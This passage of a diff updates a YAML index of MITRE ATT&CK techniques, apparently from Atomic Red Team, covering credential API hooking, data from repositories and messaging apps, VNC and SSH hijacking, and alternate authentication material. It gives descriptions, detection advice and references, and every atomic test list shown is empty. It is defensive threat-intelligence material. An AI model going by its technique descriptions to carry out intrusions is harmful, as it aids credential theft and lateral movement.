       - kill_chain_name: mitre-attack
         phase_name: collection
       x_mitre_contributors:
-      - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
       - Regina Elwell
       - Praetorian
       - Milos Stojadinovic
       - Isif Ibrahima, Mandiant
+      - Obsidian Security
+      - Naveen Vijayaraghavan
+      - Nilesh Dherange (Gurucul)
       x_mitre_deprecated: false
       x_mitre_detection: "As information repositories generally have a considerably
         large user base, detection of malicious use can be non-trivial. At minimum,
@@ -41044,10 +41652,9 @@ collection:
       - Windows
       - macOS
       - SaaS
-      - Office 365
-      - Google Workspace
       - IaaS
-      x_mitre_version: '3.3'
+      - Office Suite
+      x_mitre_version: '3.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -41060,10 +41667,20 @@ collection:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1213
         external_id: T1213
+      - source_name: Mitiga
+        description: Ariel Szarf, Doron Karmi, and Lionel Saposnik. (n.d.). Oops,
+          I Leaked It Again — How Mitiga Found PII in Exposed Amazon RDS Snapshots.
+          Retrieved September 24, 2024.
+        url: https://www.mitiga.io/blog/how-mitiga-found-pii-in-exposed-amazon-rds-snapshots
       - source_name: Atlassian Confluence Logging
         description: Atlassian. (2018, January 9). How to Enable User Access Logging.
           Retrieved April 4, 2018.
         url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+      - source_name: TrendMicro Exposed Redis 2020
+        description: David Fiser and Jaromir Horejsi. (2020, April 21). Exposed Redis
+          Instances Abused for Remote Code Execution, Cryptocurrency Mining. Retrieved
+          September 25, 2024.
+        url: https://www.trendmicro.com/en_us/research/20/d/exposed-redis-instances-abused-for-remote-code-execution-cryptocurrency-mining.html
       - source_name: Microsoft SharePoint Logging
         description: Microsoft. (2017, July 19). Configure audit settings for a site
           collection. Retrieved April 4, 2018.
@@ -41072,11 +41689,14 @@ collection:
         description: Microsoft. (n.d.). Sharepoint Sharing Events. Retrieved October
           8, 2021.
         url: https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events
+      - source_name: Cybernews Reuters Leak 2022
+        description: Vilius Petkauskas . (2022, November 3). Thomson Reuters collected
+          and leaked at least 3TB of sensitive data. Retrieved September 25, 2024.
+        url: https://cybernews.com/security/thomson-reuters-leaked-terabytes-sensitive-data/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1602.001:
     technique:
@@ -41113,7 +41733,7 @@ collection:
         description: Cisco. (2008, June 10). Identifying and Mitigating Exploitation
           of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October
           19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T01:54:22.812Z'
       name: SNMP (MIB Dump)
       description: "Adversaries may target the Management Information Base (MIB) to
         collect and/or mine valuable information in a network managed using Simple
@@ -41145,115 +41765,182 @@ collection:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1056.004:
     technique:
-      x_mitre_platforms:
-      - Windows
+      modified: '2024-08-27T21:03:56.385Z'
+      name: 'Input Capture: Credential API Hooking'
+      description: |
+        Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
+
+        * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
+        * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+        * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
+
+        Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
+
+        Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
       x_mitre_domains:
       - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Process: Process Metadata'
+      - 'Process: OS API Execution'
       type: attack-pattern
+      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
       created: '2020-02-11T19:01:15.930Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1056.004
         url: https://attack.mitre.org/techniques/T1056/004
+        external_id: T1056.004
+      - source_name: EyeofRa Detecting Hooking June 2017
+        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+          against user-land. Retrieved December 12, 2017.'
+        url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+      - source_name: Zairon Hooking Dec 2006
+        description: Felici, M. (2006, December 6). Any application-defined hook procedure
+          on my machine?. Retrieved December 12, 2017.
+        url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+      - source_name: GMER Rootkits
+        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+        url: http://www.gmer.net/
+      - source_name: MWRInfoSecurity Dynamic Hooking 2015
+        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+          Mode. Retrieved December 20, 2017.'
+        url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+      - source_name: Elastic Process Injection July 2017
+        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+          A Technical Survey Of Common And Trending Process Injection Techniques.
+          Retrieved December 7, 2017.'
+        url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+      - source_name: HighTech Bridge Inline Hooking Sept 2011
+        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+          December 12, 2017.
+        url: https://www.exploit-db.com/docs/17802.pdf
       - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
         description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
           Retrieved December 18, 2017.
         url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+      - source_name: Microsoft Hook Overview
         description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
-        source_name: Microsoft Hook Overview
-      - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
-        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
-          A Technical Survey Of Common And Trending Process Injection Techniques.
-          Retrieved December 7, 2017.'
-        source_name: Elastic Process Injection July 2017
-      - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
-        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
-          Retrieved December 12, 2017.'
-        source_name: Adlice Software IAT Hooks Oct 2014
-      - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
-        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
-          Mode. Retrieved December 20, 2017.'
-        source_name: MWRInfoSecurity Dynamic Hooking 2015
-      - url: https://www.exploit-db.com/docs/17802.pdf
-        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+        url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+      - source_name: Microsoft Process Snapshot
+        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
           December 12, 2017.
-        source_name: HighTech Bridge Inline Hooking Sept 2011
-      - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
-        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
-          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
-        source_name: Volatility Detecting Hooks Sept 2012
-      - url: https://github.com/prekageo/winhook
+        url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+      - source_name: PreKageo Winhook Jul 2011
         description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
-        source_name: PreKageo Winhook Jul 2011
-      - url: https://github.com/jay/gethooks
+        url: https://github.com/prekageo/winhook
+      - source_name: Jay GetHooks Sept 2011
         description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
           12, 2017.
-        source_name: Jay GetHooks Sept 2011
-      - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
-        description: Felici, M. (2006, December 6). Any application-defined hook procedure
-          on my machine?. Retrieved December 12, 2017.
-        source_name: Zairon Hooking Dec 2006
-      - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
-        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
-          against user-land. Retrieved December 12, 2017.'
-        source_name: EyeofRa Detecting Hooking June 2017
-      - url: http://www.gmer.net/
-        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
-        source_name: GMER Rootkits
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
-        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
-          December 12, 2017.
-        source_name: Microsoft Process Snapshot
-      - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+        url: https://github.com/jay/gethooks
+      - source_name: StackExchange Hooks Jul 2012
         description: Stack Exchange - Security. (2012, July 31). What are the methods
           to find hooked functions and APIs?. Retrieved December 12, 2017.
-        source_name: StackExchange Hooks Jul 2012
-      modified: '2022-04-25T14:00:00.188Z'
-      name: 'Input Capture: Credential API Hooking'
-      description: |
-        Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
-
-        * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
-        * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
-        * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+        url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+      - source_name: Adlice Software IAT Hooks Oct 2014
+        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+          Retrieved December 12, 2017.'
+        url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+      - source_name: Volatility Detecting Hooks Sept 2012
+        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+        url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1056.004
+    atomic_tests: []
+  T1213.005:
+    technique:
+      modified: '2024-10-16T14:22:49.146Z'
+      name: Messaging Applications
+      description: "Adversaries may leverage chat and messaging applications, such
+        as Microsoft Teams, Google Chat, and Slack, to mine valuable information.
+        \ \n\nThe following is a brief list of example information that may hold potential
+        value to an adversary and may also be found on messaging applications: \n\n*
+        Testing / development credentials (i.e., [Chat Messages](https://attack.mitre.org/techniques/T1552/008))
+        \n* Source code snippets \n* Links to network shares and other internal resources
+        \n* Proprietary data(Citation: Guardian Grand Theft Auto Leak 2022)\n* Discussions
+        about ongoing incident response efforts(Citation: SC Magazine Ragnar Locker
+        2021)(Citation: Microsoft DEV-0537)\n\nIn addition to exfiltrating data from
+        messaging applications, adversaries may leverage data from chat messages in
+        order to improve their targeting - for example, by learning more about an
+        environment or evading ongoing incident response efforts.(Citation: Sentinel
+        Labs NullBulge 2024)(Citation: Permiso Scattered Spider 2023)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
-      - kill_chain_name: mitre-attack
-        phase_name: credential-access
-      x_mitre_detection: |-
-        Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
-
-        Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
-
-        Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+      x_mitre_contributors:
+      - Menachem Goldstein
+      - Obsidian Security
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      - Office Suite
       x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
-      - 'Process: Process Metadata'
-      - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-      identifier: T1056.004
+      - 'Application Log: Application Log Content'
+      type: attack-pattern
+      id: attack-pattern--fb75213f-cfb0-40bf-a02f-3bad93d6601e
+      created: '2024-08-30T13:50:42.023Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/005
+        external_id: T1213.005
+      - source_name: Sentinel Labs NullBulge 2024
+        description: " Jim Walter. (2024, July 16). NullBulge | Threat Actor Masquerades
+          as Hacktivist Group Rebelling Against AI. Retrieved August 30, 2024."
+        url: https://www.sentinelone.com/labs/nullbulge-threat-actor-masquerades-as-hacktivist-group-rebelling-against-ai/
+      - source_name: Permiso Scattered Spider 2023
+        description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+          SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+        url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
+      - source_name: SC Magazine Ragnar Locker 2021
+        description: Joe Uchill. (2021, December 3). Ragnar Locker reminds breach
+          victims it can read the on-network incident response chat rooms. Retrieved
+          August 30, 2024.
+        url: https://www.scmagazine.com/analysis/ragnar-locker-reminds-breach-victims-it-can-read-the-on-network-incident-response-chat-rooms
+      - source_name: Guardian Grand Theft Auto Leak 2022
+        description: 'Keza MacDonald, Keith Stuart and Alex Hern. (2022, September
+          19). Grand Theft Auto 6 leak: who hacked Rockstar and what was stolen?.
+          Retrieved August 30, 2024.'
+        url: https://www.theguardian.com/games/2022/sep/19/grand-theft-auto-6-leak-who-hacked-rockstar-and-what-was-stolen
+      - source_name: Microsoft DEV-0537
+        description: Microsoft. (2022, March 22). DEV-0537 criminal actor targeting
+          organizations for data exfiltration and destruction. Retrieved March 23,
+          2022.
+        url: https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
 lateral-movement:
   T1021.005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:20:07.264Z'
       name: Remote Services:VNC
       description: |-
         Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC).  VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
@@ -41264,6 +41951,7 @@ lateral-movement:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: lateral-movement
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC.
 
@@ -41273,7 +41961,6 @@ lateral-movement:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
@@ -41289,66 +41976,67 @@ lateral-movement:
       id: attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b
       created: '2020-02-11T18:28:44.950Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1021/005
         external_id: T1021.005
-      - source_name: The Remote Framebuffer Protocol
-        description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
-          Framebuffer Protocol. Retrieved September 20, 2021.
-        url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+      - source_name: Attacking VNC Servers PentestLab
+        description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
+          VNC Servers. Retrieved October 6, 2021.
+        url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
       - source_name: MacOS VNC software for Remote Desktop
         description: Apple Support. (n.d.). Set up a computer running VNC software
           for Remote Desktop. Retrieved August 18, 2021.
         url: https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac
-      - source_name: VNC Authentication
-        description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
-          September 20, 2021.
-        url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
-      - source_name: Hijacking VNC
-        description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
-          Access and Crack). Retrieved September 20, 2021.'
-        url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
+      - source_name: Havana authentication bug
+        description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
+          seeing the VNC Consoles of Tenant B!. Retrieved September 12, 2024.
+        url: https://lists.openstack.org/pipermail/openstack/2013-December/004138.html
       - source_name: macOS root VNC login without authentication
         description: Nick Miles. (2017, November 30). Detecting macOS High Sierra
           root account without authentication. Retrieved September 20, 2021.
         url: https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication
-      - source_name: VNC Vulnerabilities
-        description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
-          Found in Linux, Windows Solutions. Retrieved September 20, 2021.
-        url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
       - source_name: Offensive Security VNC Authentication Check
         description: Offensive Security. (n.d.). VNC Authentication. Retrieved October
           6, 2021.
         url: https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/
-      - source_name: Attacking VNC Servers PentestLab
-        description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
-          VNC Servers. Retrieved October 6, 2021.
-        url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
-      - source_name: Havana authentication bug
-        description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
-          seeing the VNC Consoles of Tenant B!. Retrieved October 6, 2021.
-        url: http://lists.openstack.org/pipermail/openstack/2013-December/004138.html
-      - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
-        description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
-          Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
-          August 19, 2021.'
-        url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
       - source_name: Gnome Remote Desktop grd-settings
         description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
         url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207
       - source_name: Gnome Remote Desktop gschema
         description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
         url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in
+      - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
+        description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
+          Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
+          August 19, 2021.'
+        url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
+      - source_name: VNC Vulnerabilities
+        description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
+          Found in Linux, Windows Solutions. Retrieved September 20, 2021.
+        url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
+      - source_name: The Remote Framebuffer Protocol
+        description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
+          Framebuffer Protocol. Retrieved September 20, 2021.
+        url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+      - source_name: VNC Authentication
+        description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
+          September 20, 2021.
+        url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
+      - source_name: Hijacking VNC
+        description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
+          Access and Crack). Retrieved September 20, 2021.'
+        url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1021.005
     atomic_tests: []
   T1080:
     technique:
-      modified: '2023-05-31T12:33:20.915Z'
+      modified: '2024-10-15T16:07:36.903Z'
       name: Taint Shared Content
       description: |2-
 
@@ -41373,11 +42061,11 @@ lateral-movement:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
       - SaaS
       - Linux
       - macOS
-      x_mitre_version: '1.4'
+      - Office Suite
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Network Share: Network Share Access'
       - 'Process: Process Creation'
@@ -41400,9 +42088,8 @@ lateral-movement:
         url: https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1021.004:
     technique:
@@ -41453,7 +42140,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.004
     atomic_tests: []
   T1091:
@@ -41517,7 +42203,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1091
     atomic_tests: []
   T1021.008:
@@ -41588,7 +42273,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1563.001:
     technique:
@@ -41625,7 +42309,7 @@ lateral-movement:
         url: https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident
         description: Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr
           11 security incident. Retrieved February 17, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-23T23:11:24.682Z'
       name: SSH Hijacking
       description: |-
         Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.
@@ -41656,8 +42340,6 @@ lateral-movement:
       - root
       x_mitre_system_requirements:
       - SSH service enabled, trust relationships configured, established connections
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1021.002:
     technique:
@@ -41740,12 +42422,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.002
     atomic_tests: []
   T1550:
     technique:
-      modified: '2024-04-12T21:18:23.798Z'
+      modified: '2024-10-15T16:09:19.001Z'
       name: Use Alternate Authentication Material
       description: "Adversaries may use alternate authentication material, such as
         password hashes, Kerberos tickets, and application access tokens, in order
@@ -41772,6 +42453,7 @@ lateral-movement:
         phase_name: lateral-movement
       x_mitre_contributors:
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Configure robust, consistent account activity audit policies
         across the enterprise and with externally accessible services.(Citation: TechNet
@@ -41789,12 +42471,12 @@ lateral-movement:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
       - Containers
-      x_mitre_version: '1.3'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -41820,14 +42502,13 @@ lateral-movement:
         description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
         url: https://csrc.nist.gov/glossary/term/authentication
       - source_name: NIST MFA
-        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
-          30, 2020.
-        url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+          25, 2024.
+        url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
